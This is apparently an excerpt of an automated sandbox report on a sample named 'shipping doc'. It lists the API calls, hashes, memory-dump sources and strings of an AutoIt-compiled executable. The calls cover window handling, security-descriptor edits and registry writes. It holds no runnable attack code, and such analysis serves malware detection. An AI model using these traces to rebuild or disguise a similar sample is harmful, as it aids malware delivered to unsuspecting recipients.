                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                              • String ID:
                                                                                              • API String ID: 1996641542-0
                                                                                              • Opcode ID: cb22e12317b681f7f7bf58749ef996f9f7b2f92ac307688685a33a95c21b1a87
                                                                                              • Instruction ID: b1aa1b8739e11a43ef7e857ef530bab8c3ed23e2f388072924737669d712da3e
                                                                                              • Opcode Fuzzy Hash: cb22e12317b681f7f7bf58749ef996f9f7b2f92ac307688685a33a95c21b1a87
                                                                                              • Instruction Fuzzy Hash: CA614D72904218EFDF119FA4DC49AEE7FB9EB08320F118125F919AB6E1D7759980CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 00171128
                                                                                              • GetDesktopWindow.USER32 ref: 0017113D
                                                                                              • GetWindowRect.USER32(00000000), ref: 00171144
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00171199
                                                                                              • DestroyWindow.USER32(?), ref: 001711B9
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001711ED
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0017120B
                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0017121D
                                                                                              • SendMessageW.USER32(00000000,00000421,?,?), ref: 00171232
                                                                                              • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00171245
                                                                                              • IsWindowVisible.USER32(00000000), ref: 001712A1
                                                                                              • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001712BC
                                                                                              • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001712D0
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 001712E8
                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 0017130E
                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00171328
                                                                                              • CopyRect.USER32(?,?), ref: 0017133F
                                                                                              • SendMessageW.USER32(00000000,00000412,00000000), ref: 001713AA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                              • String ID: ($0$tooltips_class32
                                                                                              • API String ID: 698492251-4156429822
                                                                                              • Opcode ID: 471cc65c6ab6385ee3cd35c83642c65277a1467f7412c0878cdff359eac3e849
                                                                                              • Instruction ID: f9412583aa39b67033505907a24b563bfb22fed80310f0b84fc9057bfe4ec557
                                                                                              • Opcode Fuzzy Hash: 471cc65c6ab6385ee3cd35c83642c65277a1467f7412c0878cdff359eac3e849
                                                                                              • Instruction Fuzzy Hash: 7DB15A71604341AFD714DF69C884BAABBF4FF84350F40891CF999AB2A2D771E884CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000F8968
                                                                                              • GetSystemMetrics.USER32(00000007), ref: 000F8970
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000F899B
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 000F89A3
                                                                                              • GetSystemMetrics.USER32(00000004), ref: 000F89C8
                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000F89E5
                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000F89F5
                                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000F8A28
                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000F8A3C
                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 000F8A5A
                                                                                              • GetStockObject.GDI32(00000011), ref: 000F8A76
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 000F8A81
                                                                                                • Part of subcall function 000F912D: GetCursorPos.USER32(?), ref: 000F9141
                                                                                                • Part of subcall function 000F912D: ScreenToClient.USER32(00000000,?), ref: 000F915E
                                                                                                • Part of subcall function 000F912D: GetAsyncKeyState.USER32(00000001), ref: 000F9183
                                                                                                • Part of subcall function 000F912D: GetAsyncKeyState.USER32(00000002), ref: 000F919D
                                                                                              • SetTimer.USER32(00000000,00000000,00000028,000F90FC), ref: 000F8AA8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                              • String ID: AutoIt v3 GUI
                                                                                              • API String ID: 1458621304-248962490
                                                                                              • Opcode ID: 0584672e1576f643bc4da690d7cac4ae514a9891e423323c534687863c1cfa1b
                                                                                              • Instruction ID: d3fe48533a1a54b7ff177b61dadb12f0ae3f02c1ecc13acce56f8ecf2e28f972
                                                                                              • Opcode Fuzzy Hash: 0584672e1576f643bc4da690d7cac4ae514a9891e423323c534687863c1cfa1b
                                                                                              • Instruction Fuzzy Hash: 5AB18F31A00209AFDF14DF68CC59BEE7BB5FB48314F518229FA15A7690DB70E981CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 001410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00141114
                                                                                                • Part of subcall function 001410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00140B9B,?,?,?), ref: 00141120
                                                                                                • Part of subcall function 001410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00140B9B,?,?,?), ref: 0014112F
                                                                                                • Part of subcall function 001410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00140B9B,?,?,?), ref: 00141136
                                                                                                • Part of subcall function 001410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0014114D
                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00140DF5
                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00140E29
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00140E40
                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00140E7A
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00140E96
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00140EAD
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00140EB5
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00140EBC
                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00140EDD
                                                                                              • CopySid.ADVAPI32(00000000), ref: 00140EE4
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00140F13
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00140F35
                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00140F47
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00140F6E
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00140F75
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00140F7E
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00140F85
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00140F8E
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00140F95
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00140FA1
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00140FA8
                                                                                                • Part of subcall function 00141193: GetProcessHeap.KERNEL32(00000008,00140BB1,?,00000000,?,00140BB1,?), ref: 001411A1
                                                                                                • Part of subcall function 00141193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00140BB1,?), ref: 001411A8
                                                                                                • Part of subcall function 00141193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00140BB1,?), ref: 001411B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                              • String ID:
                                                                                              • API String ID: 4175595110-0
                                                                                              • Opcode ID: f82b17fd7c0b4fd659407ab2e58fab5f26b24ce3eb1c2db9b7eac9daedc92776
                                                                                              • Instruction ID: 5580874ee1704036ffcf723eb9b6cc7d4c971eaf33d5b3a36b95e19e6d9143ea
                                                                                              • Opcode Fuzzy Hash: f82b17fd7c0b4fd659407ab2e58fab5f26b24ce3eb1c2db9b7eac9daedc92776
                                                                                              • Instruction Fuzzy Hash: B171607190020AEFDF219FA5DC44FAEBBB8BF09310F144129FA19E71A1D7759985CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0016C4BD
                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0017CC08,00000000,?,00000000,?,?), ref: 0016C544
                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0016C5A4
                                                                                              • _wcslen.LIBCMT ref: 0016C5F4
                                                                                              • _wcslen.LIBCMT ref: 0016C66F
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0016C6B2
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0016C7C1
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0016C84D
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0016C881
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0016C88E
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0016C960
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                              • API String ID: 9721498-966354055
                                                                                              • Opcode ID: d53a62bf72ee5b6667566f5bdfda87b6ec99fae1a1874cfdca031aee3b5d36ac
                                                                                              • Instruction ID: e3ca1b9943dfd0f97221db5f486e9d95e5e0e3a7f81874152d938ef22ff8972c
                                                                                              • Opcode Fuzzy Hash: d53a62bf72ee5b6667566f5bdfda87b6ec99fae1a1874cfdca031aee3b5d36ac
                                                                                              • Instruction Fuzzy Hash: E91268356046419FD714DF25C881B6AB7E5EF88714F04889CF89AAB3A2DB31FD41CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 001709C6
                                                                                              • _wcslen.LIBCMT ref: 00170A01
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00170A54
                                                                                              • _wcslen.LIBCMT ref: 00170A8A
                                                                                              • _wcslen.LIBCMT ref: 00170B06
                                                                                              • _wcslen.LIBCMT ref: 00170B81
                                                                                                • Part of subcall function 000FF9F2: _wcslen.LIBCMT ref: 000FF9FD
                                                                                                • Part of subcall function 00142BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00142BFA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                              • API String ID: 1103490817-4258414348
                                                                                              • Opcode ID: 638ac3d45c7e041ff4ce1f326e65468b354db841160a5abac4eda8303b0a4a1a
                                                                                              • Instruction ID: f36b135d7b1600927a44b8b1565c45a95e19527237f2257850444bebc7207a21
                                                                                              • Opcode Fuzzy Hash: 638ac3d45c7e041ff4ce1f326e65468b354db841160a5abac4eda8303b0a4a1a
                                                                                              • Instruction Fuzzy Hash: CDE18635208741CFC715DF24C45096AB7F2BF98318B55895CF89AAB3A2D731EE85CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                              • API String ID: 1256254125-909552448
                                                                                              • Opcode ID: 091c3cca552c2eb9c8f80a452429fc9534a3a3ae9809dbcd157ed0961eb3fd97
                                                                                              • Instruction ID: c958f3f26d3005690f2b91d716f4b33738f90124a298ac9b69edd44a0d45a721
                                                                                              • Opcode Fuzzy Hash: 091c3cca552c2eb9c8f80a452429fc9534a3a3ae9809dbcd157ed0961eb3fd97
                                                                                              • Instruction Fuzzy Hash: B071043260416A8BCB20DEBCCD515BA3391AFA5794F554128FCD6A7285F771CEA4C3E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0017835A
                                                                                              • _wcslen.LIBCMT ref: 0017836E
                                                                                              • _wcslen.LIBCMT ref: 00178391
                                                                                              • _wcslen.LIBCMT ref: 001783B4
                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001783F2
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0017361A,?), ref: 0017844E
                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00178487
                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001784CA
                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00178501
                                                                                              • FreeLibrary.KERNEL32(?), ref: 0017850D
                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0017851D
                                                                                              • DestroyIcon.USER32(?), ref: 0017852C
                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00178549
                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00178555
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                              • String ID: .dll$.exe$.icl
                                                                                              • API String ID: 799131459-1154884017
                                                                                              • Opcode ID: 82b94fdaf08ed23d6b3b0e37be83238c08a97ea94e4730b9274bb5f96ab7c018
                                                                                              • Instruction ID: 6da5e76e730a3748b063d127920a1924efd260641bce58e7cd38fe9861e79a17
                                                                                              • Opcode Fuzzy Hash: 82b94fdaf08ed23d6b3b0e37be83238c08a97ea94e4730b9274bb5f96ab7c018
                                                                                              • Instruction Fuzzy Hash: 2961D0B1640215BFEB14DF64CC89BFE77B8BB08711F108509F91AE60D1DBB4AA80C7A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                              • API String ID: 0-1645009161
                                                                                              • Opcode ID: 123f3e5d7420384dbc6aa2e475384f89752e6c8f405fdf76921eeb5b5271d8fa
                                                                                              • Instruction ID: 7c503e3ad1cdac07fc6f3b6705967953ef855cc9cb680a8427f29848039007c8
                                                                                              • Opcode Fuzzy Hash: 123f3e5d7420384dbc6aa2e475384f89752e6c8f405fdf76921eeb5b5271d8fa
                                                                                              • Instruction Fuzzy Hash: D881C271648615BFDB25AF61DC82FBF37B9AF25300F044024F949BA192EB70D961C7A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00153EF8
                                                                                              • _wcslen.LIBCMT ref: 00153F03
                                                                                              • _wcslen.LIBCMT ref: 00153F5A
                                                                                              • _wcslen.LIBCMT ref: 00153F98
                                                                                              • GetDriveTypeW.KERNEL32(?), ref: 00153FD6
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0015401E
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00154059
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00154087
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                              • API String ID: 1839972693-4113822522
                                                                                              • Opcode ID: bd9fccfe1cf6fb0c9acd11f893e3577a888552b67176892cc30e9bf7e4e099ed
                                                                                              • Instruction ID: 111eab1045726922a975389e940e4549e8b0d916dd5e2cc5488508f6b8ddb898
                                                                                              • Opcode Fuzzy Hash: bd9fccfe1cf6fb0c9acd11f893e3577a888552b67176892cc30e9bf7e4e099ed
                                                                                              • Instruction Fuzzy Hash: E571C472604201DFC310EF24C8818AAB7F4EF957A8F54492DF9A5AB291EB31DD89CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadIconW.USER32(00000063), ref: 00145A2E
                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00145A40
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00145A57
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00145A6C
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00145A72
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00145A82
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00145A88
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00145AA9
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00145AC3
                                                                                              • GetWindowRect.USER32(?,?), ref: 00145ACC
                                                                                              • _wcslen.LIBCMT ref: 00145B33
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00145B6F
                                                                                              • GetDesktopWindow.USER32 ref: 00145B75
                                                                                              • GetWindowRect.USER32(00000000), ref: 00145B7C
                                                                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00145BD3
                                                                                              • GetClientRect.USER32(?,?), ref: 00145BE0
                                                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00145C05
                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00145C2F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 895679908-0
                                                                                              • Opcode ID: f76661809fdf5412313aa6fa2ef729959962d86d873da49131c79a2d0063a82b
                                                                                              • Instruction ID: b10d5f36de2235292fd3e7f6451011599c0e31dbdd9c80c199a2d6070a6afb4b
                                                                                              • Opcode Fuzzy Hash: f76661809fdf5412313aa6fa2ef729959962d86d873da49131c79a2d0063a82b
                                                                                              • Instruction Fuzzy Hash: E2716E31900B09AFDB20DFA8CE85AAEBBF6FF48705F10451CE546A36A1D775E984CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 0015FE27
                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 0015FE32
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0015FE3D
                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 0015FE48
                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 0015FE53
                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 0015FE5E
                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 0015FE69
                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 0015FE74
                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 0015FE7F
                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 0015FE8A
                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 0015FE95
                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 0015FEA0
                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 0015FEAB
                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 0015FEB6
                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 0015FEC1
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0015FECC
                                                                                              • GetCursorInfo.USER32(?), ref: 0015FEDC
                                                                                              • GetLastError.KERNEL32 ref: 0015FF1E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
